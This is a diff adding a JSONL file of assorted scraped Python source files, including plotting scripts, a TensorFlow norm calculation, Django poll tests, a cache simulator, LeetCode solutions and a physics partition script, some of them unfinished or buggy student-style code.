diff --git "a/5888.jsonl" "b/5888.jsonl" new file mode 100644--- /dev/null +++ "b/5888.jsonl" @@ -0,0 +1,596 @@ +{"seq_id":"139593293","text":"# Python program to plot two or more lines and set the line markers\nimport matplotlib.pyplot as plt\n# x axis values\nx = [1,4,5,6,7]\n# y axis values\ny = [2,6,3,6,3]\n\n# plotting the points\nplt.plot(x, y, color='red', linestyle='dashdot', linewidth = 3,\n marker='o', markerfacecolor='blue', markersize=12)\n# Set the y-limits of the current axes.\nplt.ylim(1,8)\n# Set the x-limits of the current axes.\nplt.xlim(1,8)\n\n# naming the x axis\nplt.xlabel('x - axis')\n# naming the y axis\nplt.ylabel('y - axis')\n\n# giving a title to my graph\nplt.title('Display marker')\n# function to show the plot\nplt.show()\n","sub_path":"Matplotlib/line_markers.py","file_name":"line_markers.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"592164365","text":"import functools\nimport operator\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.keras import Sequential\nfrom tensorflow.python.keras._impl.keras.layers import Conv2D\n\n\ndef get_orthogonal_basis(*dim):\n \"\"\" Get the standard basis of a finite dimensional vector space\n\n # Args.\n *dim: a dimension of space\n # Returns\n list, basis vectors\n \"\"\"\n\n basis = [None] * functools.reduce(operator.mul, dim)\n zero = np.zeros(shape=dim, dtype=np.float32)\n for i, (pos, _) in enumerate(np.ndenumerate(zero)):\n basis[i] = zero.copy()\n basis[i][pos] = 1\n return basis\n\n\ndef hs_norm(op, input_shape):\n \"\"\" Hilbert-Schmidt norm of an operator on Hilbert space\n\n # Args.\n op: callable, an operator\n input_shape: tuple,\n # Returns\n float, a value\n \"\"\"\n\n norm_square = 0.\n base = np.zeros(shape=input_shape, dtype=np.float32)\n prev_pos = None\n for i, (pos, _) in enumerate(np.ndenumerate(base)):\n if prev_pos is not None:\n base[prev_pos] = 0.\n base[pos] = 1\n proj = op(base).flatten()\n norm_square += np.dot(proj, proj)\n prev_pos = pos\n\n return np.sqrt(norm_square)\n\n\ndef tf_hs_norm(op, input_tensor):\n \"\"\" Hilbert-Schmidt norm of an operator on Hilbert space\n\n # Args.\n op: callable, an operator\n input_tensor: tf.Tensor,\n # Returns\n float, a value\n \"\"\"\n\n fh, fw, nc = input_tensor.shape[1:] # (idx, height, width, channels)\n base = tf.ones_like(input_tensor)\n size = tf.reduce_prod(input_tensor.shape[1:])\n\n def cond(i, x):\n return i < size\n\n base = tf.Variable(tf.zeros((1, fh, fw, nc)))\n\n def body(i, x):\n pos_nc = tf.floormod(i, nc)\n rem = tf.floordiv(i, nc)\n pos_fw = tf.floormod(rem, fw)\n rem = tf.floordiv(rem, fw)\n pos_fh = tf.floormod(rem, fh)\n up = tf.scatter_nd_update(base, [(0, pos_fh, pos_fw, pos_nc)], [1])\n down = tf.scatter_nd_update(base, [(0, pos_fh, pos_fw, pos_nc)], [0])\n with tf.control_dependencies([up]):\n proj = op(base)\n delta = tf.reduce_sum(tf.pow(proj, 2))\n argg = tf.argmax(base)\n x = tf.Print(x, [i, pos_fh, pos_fw, pos_nc, x, proj, base, argg])\n\n return i + 1, tf.add(x, delta)\n\n norm = tf.constant(0.)\n _, norm = tf.while_loop(cond, body, [0, norm], parallel_iterations=1)\n\n return tf.sqrt(norm), base\n\n\nif __name__ == '__main__':\n ip_tensor = tf.zeros_like((2, 2), dtype=tf.float32)\n\n def operator(x):\n return x + [[0, 1], [0, 0]]\n\n model = Sequential()\n model.add(Conv2D(3, (2, 2),\n input_shape=(4, 4, 2),\n kernel_initializer='glorot_uniform'))\n ip_tensor = model.layers[0].input\n print(model.layers[0].get_weights()[0])\n def conv_op(x):\n return model.layers[0](x)\n data = np.ones([1, 4, 4, 2])\n oo, ba = tf_hs_norm(conv_op, ip_tensor)\n with tf.Session() as sess:\n summ = tf.summary.FileWriter('looo', graph=sess.graph)\n sess.run(tf.global_variables_initializer())\n print(sess.run([oo, ba], feed_dict={ip_tensor: data}))\n summ.flush()\n","sub_path":"rcp/norms.py","file_name":"norms.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"32268389","text":"# simpleButtonClass.py\n\nimport pygame\nfrom pygame.locals import *\n\n\nclass simpleButton:\n\n # class that creates button objects\n\n def __init__(self, height, width, color, textColor, label, surf, position):\n\n # define some values\n\n self.SURF = surf\n self.POS = position\n self.BUTCOLOR = color\n self.BUTGREY = (color[0] * .25, color[1] * .25, color[2] * .25)\n self.HIGHLIGHTCOLOR = (color[0] + ((255 - color[0])//3),\n color[1] + ((255 - color[1])//3),\n color[2] + ((255 - color[2])//3))\n \n self.TEXTCOLOR = textColor\n self.BLACK = (0, 0, 0)\n\n self.HEIGHT = height\n self.WIDTH = width\n self.RADIUS = self.HEIGHT//2\n THEIGHT = int(self.HEIGHT * .72)\n\n self.active = True\n self.highlighted = False\n\n BUTFONT = pygame.font.SysFont(\"Impact\", THEIGHT)\n # Render a Text Surface\n self.TEXTSURF = BUTFONT.render(label, True, textColor, None)\n\n w, h = self.TEXTSURF.get_size()\n \n self.XPOS = (self.WIDTH - w)//2\n self.YPOS = int((self.HEIGHT - h)//2)\n twidth = w\n\n self.BUTTONSURF = pygame.Surface((self.WIDTH, self.HEIGHT), flags=SRCALPHA, depth=32)\n self.BUTTONSURF.fill((0, 0, 0, 0))\n\n def __buttonBG(self, color):\n\n # create square with rounded corners\n \n pygame.draw.circle(self.BUTTONSURF, color, (self.RADIUS, self.RADIUS),\n self.RADIUS)\n pygame.draw.circle(self.BUTTONSURF, color,\n (self.WIDTH - self.RADIUS, self.RADIUS), self.RADIUS)\n\n pygame.draw.rect(self.BUTTONSURF, color, Rect((self.RADIUS, 0), (self.WIDTH - 2 * self.RADIUS, self.HEIGHT)))\n\n def __buttonText(self):\n\n # Draw Text\n self.BUTTONSURF.blit(self.TEXTSURF, (self.XPOS, self.YPOS))\n\n def clicked(self, mouseXY):\n yesORno = False\n P1 = self.POS\n P2 = (P1[0] + self.WIDTH, P1[1] + self.HEIGHT)\n yesORno = (self.active and P1[0] <= mouseXY[0] <= P2[0] and\n P1[1] <= mouseXY[1] <= P2[1])\n\n return yesORno\n\n def Active(self):\n self.active = True\n return True\n\n def InActive(self):\n self.active = False\n return False\n\n\n def displayBut(self):\n \n if self.active:\n if self.highlighted:\n self.__buttonBG(self.HIGHLIGHTCOLOR)\n self.__buttonText()\n self.SURF.blit(self.BUTTONSURF, self.POS)\n else:\n self.__buttonBG(self.BUTCOLOR)\n self.__buttonText()\n self.SURF.blit(self.BUTTONSURF, self.POS)\n\n \n## if B1.clicked(mouseXY)\n## B1.displayBut()\n## setValue(dieobjlist)\n \n","sub_path":"gameCode/simpleButtonClass001.py","file_name":"simpleButtonClass001.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"279616042","text":"import keras\nfrom sklearn.preprocessing import LabelBinarizer\nimport numpy as np\n\n\n# Hyperparameters\n# nb_examples = 1400\nmax_features = 4\nmaxlen = 10000\nbatch_size = 30\n#embedding_dims = 50\nnb_filter = [20, 20]\nfilter_length = [50, 3]\nhidden_dims = 200\nnb_epoch = 10\n\n# Load data as one hot vector\n# A sequence should be in the string format\nseqs = ['ACTGATTA', 'ATTTAAAA']\nlb = LabelBinarizer()\nlb.fit(['A', 'T', 'C', 'G'])\n# Create an array of the entire example size\nX_train = np.zeros(shape=(1400, 100))\nfor i in range(len(seqs)):\n X_train[i] = lb.transform(list(seq))\n\n# X_train should have shape (#examples, max_len) \ny_train = ...\n\n# Build layers:\n# Embedding -> Convolution -> pool -> hidden -> fully connected\ndef train_operon(dataset='',\n nb_filter=[20, 20],\n filter_length=[50, 3],\n max_features=4,\n maxlen=10000,\n batch_size=30,\n #embedding_dims=50,\n hidden_dims=200,\n nb_epoch=10):\n # Model types: Sequential and functional. We use functional here (similar to\n # theano functions\n\n # Define input as having 10000 characters of size 4, where each dimension\n # encodes the presence/absence of a character\n main_input = Input(shape(maxlen,))\n\n #Embedding(max_features, embedding_dims, input_length=maxlen, dropout=0.2))\n conv_out = Lambda(one_hot_encoding, output_shape=[maxlen, max_features])(inputs)\n\n for i in range(len(nb_filters)):\n\n conv_out = Convolution1D(nb_filter=nb_filter[i],\n filter_length=filter_length[i],\n border_mode='valid',\n activation='relu',\n init='glorot_normal',\n subsample_length=1)(conv_out)\n\n conv_out = Dropout(0.1)(conv_out)\n conv_out = MaxPooling1D(pool_length=pool_length)(conv_out)\n\n # Hidden Layer\n Hidden = Dense(hidden_dims)(conv_out)\n Hidden = Dropout(0.5)(Hidden)\n Hidden = Activation('relu')(Hidden)\n\n # fully connected Layer\n fully_connected = Dense(1)(Hidden)\n main_output = Activation('softmax')(fully_connected)\n\n model = Model(inputs=main_input, outputs=main_output)\n\n model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n print(model.summary())\n\n model.fit(X_train, y_train,\n batch_size=batch_size,\n nb_epoch=nb_epoch,\n validation_data=(X_test, y_test))\n\nif __name__ == '__main__':\n train_operon(dataset='',\n nb_filters=[20, 20],\n filter_sizes=[50, 3])\n\n #predict_operon(dataset='', start, end)\n","sub_path":"test_operon.py","file_name":"test_operon.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"525232524","text":"#!/bin/python3\n \ndef countNegatives(myList):\n negativeNums = 0\n \n for n in myList:\n if int(n) < 0:\n negativeNums = negativeNums + 1\n return negativeNums\n\ndef getBiggestNeg(myList):\n maxNeg = -1000\n for x in myList:\n if int(x) < 0 and int(x) > maxNeg:\n maxNeg = int(x)\n return maxNeg\n\ndef isAllZeroes(myList):\n allZeroes = True\n for n in myList:\n if int(n) != 0:\n allZeroes = False\n return allZeroes\n\ndef findMaxProduct(myList):\n # Check for zeroes:\n if isAllZeroes(xs):\n return str(0)\n \n # If there are an odd number of negatives, we'll need to remove one of em\n if(countNegatives(xs) % 2 != 0):\n maxNeg = getBiggestNeg(xs)\n xs.remove(str(maxNeg)) # need to force it to int\n\n # Actually do the calculations:\n product = 1\n for x in xs:\n y = int(x)\n if y != 0 and abs(y) <= 1000:\n product = product * y\n return product\n \n#---------------------------------------------------\nxs = input().strip().split(\",\")\n\nif len(xs) > 50:\n print(\"Error - only 50 length allowed\")\nelse:\n print(findMaxProduct(xs))","sub_path":"CodeKatas/python/powerHungry.py","file_name":"powerHungry.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"97077704","text":"### filterByState.py ###\n#\n# Filters out aggregate data for specific states\n#\n\nimport sys\n\nstates = []\nif len(sys.argv) > 1:\n for i in range(1, len(sys.argv)):\n states.append(sys.argv[i])\n\nfor line in sys.stdin:\n data = line.split(\"\\t\")\n state = (data[0])[-2:]\n if state in states:\n print(line.strip())\n\n","sub_path":"filterByState.py","file_name":"filterByState.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"466366342","text":"from datetime import timedelta\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.utils.datetime_safe import date\nfrom rest_framework.status import (HTTP_200_OK, HTTP_201_CREATED,\n HTTP_400_BAD_REQUEST)\nfrom rest_framework.test import APITestCase\n\nfrom polls.models import AnswerOption, Poll, Question, User\n\n\nclass PollTestCase(TestCase):\n def setUp(self) -> None:\n self.today = date.today()\n Poll.objects.create(name='Проверочный опрос', start_date=self.today,\n end_date=self.today,\n description='Описание для опроса')\n\n def test_poll_has_correct_str_view(self):\n poll = Poll.objects.get(name='Проверочный опрос')\n expected_result = f'Проверочный опрос ({self.today} - {self.today})'\n self.assertEqual(str(poll), expected_result)\n\n\nclass QuestionTestCase(TestCase):\n def setUp(self) -> None:\n poll = Poll.objects.create(\n name='Проверочный опрос', start_date=date.today(),\n end_date=date.today(), description='Описание для опроса')\n Question.objects.create(text='Что должно здесь быть?',\n type=Question.TypeChoices.TEXT_ANSWER,\n poll=poll)\n\n def test_question_has_correct_str_view(self):\n text = 'Что должно здесь быть?'\n question = Question.objects.get(text=text)\n self.assertEqual(str(question), f'TEXT_ANSWER: {text}')\n\n\nclass AnswerOptionTestCase(TestCase):\n def setUp(self) -> None:\n poll = Poll.objects.create(name='Проверочный опрос',\n start_date=date.today(),\n end_date=date.today(),\n description='Описание для опроса')\n question = Question.objects.create(\n text='Что должно здесь быть?',\n type=Question.TypeChoices.TEXT_ANSWER, poll=poll)\n AnswerOption.objects.create(question=question, content='Django')\n\n def test_answer_option_has_correct_view(self):\n content = 'Django'\n answer_option = AnswerOption.objects.get(content=content)\n self.assertEqual(str(answer_option), content)\n\n\nclass ActivePollsTestCase(APITestCase):\n def setUp(self) -> None:\n User.objects.create_user('test')\n\n poll = Poll.objects.create(name='Проверочный опрос',\n start_date=date.today(),\n end_date=date.today(),\n description='Описание для опроса')\n yesterday = date.today() - timedelta(days=1)\n Poll.objects.create(name='Неактивный опрос', start_date=yesterday,\n end_date=yesterday,\n description='Описание для опроса')\n\n self.text_answer_question = Question.objects.create(\n text='Как работают Middleware?',\n type=Question.TypeChoices.TEXT_ANSWER, poll=poll)\n\n self.single_answer_question = Question.objects.create(\n text='Django или Flask?', type=Question.TypeChoices.SINGLE_ANSWER,\n poll=poll)\n AnswerOption.objects.create(question=self.single_answer_question,\n content='Django')\n AnswerOption.objects.create(question=self.single_answer_question,\n content='Flask')\n\n self.several_options_answer_question = Question.objects.create(\n text='Какие возможности в Django?',\n type=Question.TypeChoices.SEVERAL_OPTIONS_ANSWER,\n poll=poll)\n AnswerOption.objects.create(\n question=self.several_options_answer_question, content='ASGI')\n AnswerOption.objects.create(\n question=self.several_options_answer_question, content='WSGI')\n AnswerOption.objects.create(\n question=self.several_options_answer_question, content='ML')\n\n def test_polls_are_active(self):\n url = reverse('active_polls')\n response = self.client.get(url)\n expected_response = [\n {'id': 3, 'question_set': [\n {'id': 4, 'text': 'Как работают Middleware?',\n 'type': 'TEXT_ANSWER'},\n {'id': 5, 'text': 'Django или Flask?',\n 'type': 'SINGLE_ANSWER'},\n {'id': 6, 'text': 'Какие возможности в Django?',\n 'type': 'SEVERAL_OPTIONS_ANSWER'}],\n 'name': 'Проверочный опрос', 'start_date': str(date.today()),\n 'end_date': str(date.today()),\n 'description': 'Описание для опроса'}]\n\n self.assertListEqual(response.json(), expected_response)\n self.assertEqual(response.status_code, HTTP_200_OK)\n\n\n def test_answer_by_question_type(self):\n url = reverse('create_answer')\n\n response = self.client.post(\n url, data={'user': 1, 'question': self.text_answer_question.id})\n expected_response = {\n 'non_field_errors': ['Недопустимое количество ответов на '\n 'вопрос.']}\n self.assertDictEqual(response.json(), expected_response)\n self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n response = self.client.post(\n url, data={'user': 1, 'question': self.text_answer_question.id,\n 'text': 'Какой-то текст', 'choices': [1, 2]})\n self.assertDictEqual(response.json(), expected_response)\n self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n response = self.client.post(url,\n data={'user': 1, 'question': self.text_answer_question.id,\n 'text': '', 'choices': [1, 2]})\n expected_response = {\n 'non_field_errors': ['Для указанного вопроса отсутствует '\n 'ответ в виде текста.']}\n self.assertDictEqual(response.json(), expected_response)\n self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n response = self.client.post(\n url, data={'user': 1, 'question': self.single_answer_question.id,\n 'text': '', 'choices': [1, 2]})\n expected_response = {\n 'non_field_errors': ['Для указанного вопроса слишком много '\n 'выбранных вариантов ответа.']}\n self.assertDictEqual(response.json(), expected_response)\n self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n response = self.client.post(url,\n data={'user': 1,\n 'question': self.several_options_answer_question.id,\n 'text': 'Какой-то текст.', 'choices': []})\n expected_response = {\n 'non_field_errors': ['Для указанного вопроса не указан ни '\n 'один вариант ответа.']}\n self.assertDictEqual(response.json(), expected_response)\n self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n response = self.client.post(\n url, data={'user': 1,\n 'question': self.several_options_answer_question.id,\n 'text': '', 'choices': [2, 3, 4]})\n expected_response = {\n 'non_field_errors': ['Указанный вариант ответа недоступен '\n 'для этого вопроса.']}\n self.assertDictEqual(response.json(), expected_response)\n self.assertEqual(response.status_code, HTTP_400_BAD_REQUEST)\n\n good_response = self.client.post(\n url, data={'user': 1, 'question': self.single_answer_question.id,\n 'choices': [1]})\n expected_response = {'id': 1, 'text': '', 'user': 1, 'question': 2,\n 'choices': [1]}\n self.assertDictEqual(good_response.json(), expected_response)\n self.assertEqual(good_response.status_code, HTTP_201_CREATED)\n","sub_path":"source/polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"213503396","text":"import configparser, cache, argparse, logging, pprint, datetime\nimport simpy, threading, multiThread, event\nfrom cache import Cache\nfrom traceParser import * \nfrom dataCenter import DataCenter \nfrom scheduler import Scheduler \nimport timeit\nimport cProfile\nimport pstats\nimport io\n\nif __name__ == '__main__':\n start = timeit.default_timer()\n parser = argparse.ArgumentParser(description='Simulate a cache')\n #parser.add_argument('-t','--trace-file', help='Storage access trace file', required=True)\n parser.add_argument('-c','--config-file', help='Configuration file for datacenter topology', required=True)\n arguments = vars(parser.parse_args())\n #trace_file = arguments['trace_file']\n \n config = configparser.ConfigParser()\n config.read_file(open(arguments['config_file']))\n\n log_filename = 'wb_sim.log'\n with open(log_filename, 'w'):\n pass\n logger = logging.getLogger()\n fh = logging.FileHandler(log_filename)\n logger.addHandler(fh)\n logger.setLevel(logging.DEBUG)\n \n logger.info('Loading config...')\n print ('Loading config...')\n \n logger.info('Creating Enviroment...')\n print ('Creating Enviroment...') \n env = simpy.Environment()\n #directory = {}\n dc = DataCenter(\"datacenter1\")\n dc.build(config, logger, env) \n #dc.scheduler = Scheduler(dc.compute_nodes, dc.cpu, dc.blk_dir, dc.mapper_list, dc.cache_layer, dc.jobStat, dc.mapper_size, dc.chunk_size)\n dc.scheduler = Scheduler(dc.compute_nodes, dc.cpu, dc.blk_dir, dc.mapper_list, dc.cache_layer, dc.mapper_size, dc.chunk_size)\n \n \n racks = int(config.get('Simulation', 'cache nodes'))\n logger.info('Parsing Trace File...')\n\n #df = {}\n print(\"Parsing Trace File...\")\n for i in range(racks):\n trace_file = config.get('Simulation', 'traceFile'+str(i))\n logger.info('Generating Final Trace File...')\n print(\"Generating Final Trace File...\")\n dc.scheduler.addJobs(i, trace_file, dc) \n #df[i] = traceParser(trace_file)\n #print(dc.setKeys)\n\n logger.info('Running Simulation')\n print('Running Simulation')\n \n # Thread pool for mappers\n \"\"\"\n print(len(dc.mapper_list.keys()))\n pool = multiThread.ThreadPool(len(dc.mapper_list.keys()))\n for i in dc.mapper_list.keys():\n pool.add_task(event.request_generator, i, dc, dc.scheduler, env)\n\n \"\"\"\n for i in dc.mapper_list:\n event.request_generator(i, dc, dc.scheduler, env)\n\n policy = config.get('Simulation', 'cache policy')\n #if policy == \"LORE\":\n # pool.add_task(event.agingFunc, dc, env, dc.interval)\n\n\n #pool.add_task(event.cleanUpDir, dc, env, float(config.get('Directory', 'cleanup interval')))\n\n #pool.wait_completion()\n #env.run(until = config.get('Simulation', 'end'))\n\n \"\"\"\n pr = cProfile.Profile()\n pr.enable()\n\n env.run()\n\n pr.disable()\n s = io.StringIO()\n ps = pstats.Stats(pr, stream=s).sort_stats('tottime')\n ps.print_stats()\n\n with open('40000.txt', 'w+') as f:\n f.write(s.getvalue())\n\n \"\"\"\n env.run()\n\n print('----------Datalake ----------')\n print(\"Datalake access is %s\" %(dc.dl_access))\n hit_count = 0\n hit_size_count = 0\n miss_count = 0\n miss_size_count = 0\n local_count = 0\n local_size_count = 0\n remote_count = 0\n remote_size_count = 0\n for i in range(dc.c_nodes):\n c_name = \"cache\"+str(i) #i is rack id\n #hit_count += dc.cache_layer[c_name].hit_count\n local_count += dc.cache_layer[c_name].local_hit\n local_size_count += dc.cache_layer[c_name].local_size_hit\n remote_count += dc.cache_layer[c_name].remote_hit\n remote_size_count += dc.cache_layer[c_name].remote_size_hit\n miss_count += dc.cache_layer[c_name].miss_count\n miss_size_count += dc.cache_layer[c_name].miss_size_count\n #print(\"HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].hit_count))\n print(\"Local HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].local_hit))\n print(\"Local BYTE HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].local_size_hit))\n print(\"Remote HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].remote_hit))\n print(\"Remote BYTE HIT COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].remote_size_hit))\n print(\"MISS COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].miss_count))\n print(\"BYTE MISS COUNT for cache %s is %s\" %( c_name, dc.cache_layer[c_name].miss_size_count))\n #dc.cache_layer[c_name].print()\n print(\"Total Object Hit count is %d\" %(local_count+remote_count))\n print(\"Total BYTE Hit count is %d\" %(local_size_count+remote_size_count))\n print(\"Total Local Object Hit count is %d\" %local_count)\n print(\"Total Local BYTE Hit count is %d\" %local_size_count)\n print(\"Total Remote Object Hit count is %d\" %remote_count)\n print(\"Total Remote BYTE Hit count is %d\" %remote_size_count)\n print(\"Total Object Miss count is %d\" %miss_count)\n print(\"Total BYTE Miss count is %d\" %miss_size_count)\n print(\"Runtime is: \", dc.scheduler.endTime)\n stop = timeit.default_timer()\n print('Time: ', stop - start)\n# s_thread.join()\n","sub_path":"wb_sim.py","file_name":"wb_sim.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"621070411","text":"import re\nfrom collections import defaultdict\n\nclass Solution:\n def twoSum(self, nums, target):\n result = []\n for i in range(len(nums)):\n for j in range(1, len(nums)):\n if ((i+j) == target):\n result.append(i)\n result.append(j)\n return result\n\n # def addTwoNumbers(self, l1, l2):\n # c = 0\n # head = ListNode(-1)\n # last = head\n #\n # while l1 != None or l2 != None:\n # num = c\n # if(l1 != None):\n # num, l1 = num + l1.val, l1.next\n # if(l2 != None):\n # num, l2 = num + l2.val, l2.next\n #\n # c = num // 10\n # num = num % 10\n #\n # new_node = ListNode(num)\n # new_node.next = None\n # last.next = new_node\n # last = new_node\n #\n # if(c > 0):\n # new_node = ListNode(c)\n # last.next = new_node\n # last = new_node\n #\n # return head.next\n\n\n def lengthOfLongestSubstring(self, s):\n substring, length, max_len = \"\", 0, 0\n for c in s:\n if c in substring:\n index = substring.find(c)\n substring = substring[(index + 1)::]\n\n substring += c\n length = len(substring)\n\n if length > max_len:\n max_len = length\n\n return max_len\n\n def findMedianSortedArrays(self, nums1, nums2):\n combList = nums1 + nums2\n combList.sort()\n listSize = len(combList)\n\n if (listSize%2 == 0):\n val1 = combList[(listSize//2) - 1]\n val2 = combList[listSize//2]\n return ((val1 + val2) / 2)\n\n return float(combList[listSize//2])\n\n def longestPalindrome(self, s: str):\n curr = \"\"\n temp = \"\"\n\n if len(s) <= 1:\n return \"\"\n\n for idx in range(len(s)):\n temp += s[idx]\n for letter in s[idx+1:]:\n if letter == temp[0]:\n temp += letter\n if len(temp) > len(curr):\n curr = temp\n temp = \"\"\n break\n else:\n temp = \"\"\n break\n else:\n temp += letter\n temp = \"\"\n\n return curr\n\n def convert(self, s, numRows):\n if numRows <= 1:\n return s\n\n matrix = []\n\n def myAtoi(self, str: str) -> int:\n num = ''\n str = str.lstrip(' ')\n\n if (not str):\n return 0\n\n if (str[0] == '-' or str[0] == '+'):\n num = str[0]\n str = str[1:]\n\n # check digits\n for ch in str:\n if (ch.isdigit()):\n num += ch\n else:\n break\n\n try:\n value = int(num)\n #check overflow\n if (value.bit_length() >= 32):\n return (2**31-1) if value > 0 else -2**31\n return value\n except ValueError:\n return 0\n\n def isPalindrome(self, x: int) -> bool:\n num = str(x)\n for i in range(len(num)):\n if num[i] != num[-1 - i]:\n return False\n if i >= (len(num)/2):\n return True\n return True\n\n def isMatch(self, s: str, p: str) -> bool:\n pattern = \"^(\" + p + \")$\"\n if re.match(pattern,s):\n return True\n else:\n return False\n\n def maxArea(self, height: [int]) -> int:\n l = 0\n r = len(height) -1\n mArea = 0\n\n while l < r:\n hr, hl = height[r], height[l]\n mArea = max(mArea, (r-l) * min(hr,hl))\n\n if hr < hl:\n r -= 1\n else:\n l += 1\n return mArea\n\n def intToRoman(self, num: int) -> str:\n romanNumber = {\n 1000: \"M\", 900: \"CM\", 500: \"D\", 400: \"CD\", 100: \"C\",\n 90: \"XC\", 50: \"L\", 40: \"XL\", 10: \"X\", 9: \"IX\",\n 5: \"V\", 4: \"IV\", 1: \"I\"\n }\n ans = \"\"\n\n if num < 1 or num > 3999:\n return \"\"\n\n while num != 0:\n for i in romanNumber:\n if num >= i:\n num -= i\n ans += romanNumber[i]\n break\n\n return ans\n\n def romanToInt(self, s: str) -> int:\n ans,idx = 0, 0\n romanNumber = {\n \"M\":1000, \"CM\":900, \"D\":500, \"CD\":400, \"C\":100,\n \"XC\":90, \"L\":50, \"XL\":40, \"X\":10, \"IX\":9,\n \"V\":5, \"IV\":4, \"I\":1\n }\n\n while idx <= len(s) - 2:\n if (s[idx]+s[idx+1] in romanNumber):\n print(idx, s[idx]+s[idx+1])\n ans += romanNumber[(s[idx]+s[idx+1])]\n idx += 2\n else:\n print(idx, s[idx])\n ans += romanNumber[s[idx]]\n idx += 1\n\n if idx == len(s) - 1:\n ans += romanNumber[s[idx]]\n\n return ans\n\n def longestCommonPrefix(self, strs: [str]) -> str:\n comPrefix = defaultdict(int)\n return \"\"\n\nif __name__ == \"__main__\":\n leetCode = Solution()\n print(leetCode.longestCommonPrefix([\"flower\",\"flow\",\"flight\"]))\n","sub_path":"LeetCode.py","file_name":"LeetCode.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"22976171","text":"'''\nUses unrestricted partitions to find physical variables and plots.\nPatrick McMillin\nPHYS 431, Dr. Taheri\nLast modified: 5 December 2017\n'''\n'''\nSection 3.3 outlines the 'centered-difference' procedure. T = dU/dS\nfor the ith value of T: T[i] = (U[i+1]-U[i-1]) / (S[i+1]-S[i-1])\nSimilarly, we can generate Cv in a loop by calculating Cv = dU/dT\nCv[i] = (U[i+1]-U[i-1]) / (T[i+1]-T[i-1])\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n# Script written to find the partitions\nimport Unrestricted_Partitions\n# Calls function to generate partitions and assigns them to a list.\nPartitions = Unrestricted_Partitions.Generate_Unrestricted_Partitions()\n# Energy levels are just the numerical values we found the\n# unrestricted partitions for (i.e. the numbers 0 through 100).\n# For simplicity, $\\eta$ = k = 1.\nEnergy = range(0,101)\nEntropy = []\n# Takes the logarithm of all microstates to find S/k.\nfor i in Partitions:\n Entropy.append(np.log(i))\nTemperature = [0]\nHeat_Capacity = [0]\n# Temperatures\nfor i in range(1,(len(Energy)-1)): # NOTE: len()-1 since we will not have a Energy[101]\n Temperature.append((Energy[i+1]-Energy[i-1]) / (Entropy[i+1]-Entropy[i-1]))\n# Heat capacities\nfor i in range(1,(len(Energy)-2)): # NOTE: len()-1 since we will not have a Temperature[100]\n Heat_Capacity.append((Energy[i+1]-Energy[i-1]) / (Temperature[i+1]-Temperature[i-1]))\ndel Temperature[0]\nplt.figure(1)\nplt.scatter(Temperature, Heat_Capacity)\nplt.title('Heat Capacity (C/k) vs Temperature (kT/$\\eta$)')\nplt.xlabel('Temperature (kT/$\\eta$)')\nplt.ylabel('Heat Capacity (C/k)')\nplt.savefig('T_vs_Cv.pdf')\n\nplt.figure(2)\nTemp_List = np.linspace(1,9,100)\nRamanujan_Heat_Capacity_Coefficient = ((np.pi)**2)/3\nP = plt.scatter(Temperature, Heat_Capacity)\nR = plt.plot(Temp_List, (Ramanujan_Heat_Capacity_Coefficient*Temp_List)-2, 'r-')\nplt.title('Ramanujans Approximation for Heat Capacity (C/k) vs Temperature (kT/$\\eta$)')\nplt.xlabel('Temperature (kT/$\\eta$)')\nplt.ylabel('Heat Capacity (C/k)')\nplt.legend(['Heat capacity from Ramanujan approximation','Heat capacity from unrestricted partitions'])\nplt.savefig('Ramanujan_T_vs_Cv.pdf')\n\nprint(\"Ramanujan approximation for q=10:\", Ramanujan_Approximation[10])\nprint(\"Actual value for q=10:\", Partitions[10])\nprint(\"Ramanujan approximation for q=100:\", Ramanujan_Approximation[100])\nprint(\"Actual value for q=100:\", Partitions[100])\nRamanujan_Approximation = [1]\nfor i in range(1,len(Energy)):\n Ramanujan_Approximation.append((np.exp(np.pi*np.sqrt(2*i/3)))/(4*np.sqrt(3)*i))\n","sub_path":"PHYS_431/Finding_Plotting_S_T_Cv.py","file_name":"Finding_Plotting_S_T_Cv.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"440592478","text":"import os\nfrom multiprocessing import Pool\n\ndef copyFileTask(name,args):\n \"\"\"完成copy一个文件的功能\"\"\"\n print(name)\n fr=open(oldFileName+\"/\"+name)\n fw=open(newFileName+\"/\"+name,\"w\")\n print(\"--------\")\n content= fr.read()\n 